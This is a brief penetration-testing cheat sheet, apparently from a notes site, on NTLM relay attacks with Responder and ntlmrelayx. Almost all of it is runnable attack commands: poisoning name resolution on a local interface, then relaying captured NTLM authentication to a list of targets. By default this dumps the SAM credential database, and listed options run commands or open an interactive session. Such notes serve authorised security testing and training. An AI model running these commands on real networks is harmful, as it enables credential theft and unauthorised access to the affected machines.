Responder

Table of content

Basic launch
Windows
Ressources

Basic launch

Disable SMB and HTTP in Responder.conf

sudo python3 Responder.py -I enp0s3 -r -d -w
# sudo PYTHONPATH=venv/lib/python3.6/site-packages python3 Responder-3.1.3.0/Responder.py -I ens192 -A

On another terminal

# ${targets_file} is a list of target where NTLM authentication will be forwarded
# by default, it will dump the SAM
# -c to execute specific command
# -e to execute specific file
# --interactive to get an interactive session
ntlmrelayx -tf ${targets_file} --smb2support

Windows

For Windows you must use WinDivert driver to forward SMB traffic on another port.

Ressources

Practical NTLM relay guide : https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

results matching ""

No results matching ""

results matching ""

No results matching ""